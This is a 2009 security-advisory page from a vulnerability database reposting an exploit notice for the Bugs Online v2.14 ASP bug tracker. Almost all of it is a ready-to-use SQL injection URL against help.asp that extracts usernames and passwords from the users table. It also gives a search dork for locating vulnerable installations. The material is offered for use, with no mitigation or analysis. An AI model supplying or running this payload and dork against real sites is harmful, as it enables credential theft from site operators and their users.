Security Advisory: Bugs Online v2.14 Sql Injection - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  CORE-2008-1211: Amaya web editor XML and HTML parser vulnerabilities
  [SECURITY] [DSA 1715-1] New moin packages fix insufficient input sanitising
  PerlSoft Guestbook v1.7b Bruteforcer + RCE!
  Vulnerabilities in E107

From: r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date: 31.01.2009
Subject: Bugs Online v2.14 Sql Injection

#################################################################################
####
####                        Bugs Online v2.14 Sql Injection                     ####
#################################################################################
####
#
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#################################################################################
####
#
#
#Download : http://sourceforge.net/project/showfiles.php?group_id=42528             #
#
#
#Dork : ext:asp Welcome to bugs online                                              #
#
#
#################################################################################
####
#                                      [Bug]                                        #
#
#
#http://[site]/help.asp?stype=-999'%20union%20select%200,
suser_name,spassword%20from%20tblusers%20where%20'1
#
#
###################################### TNX GOD ######################################

test server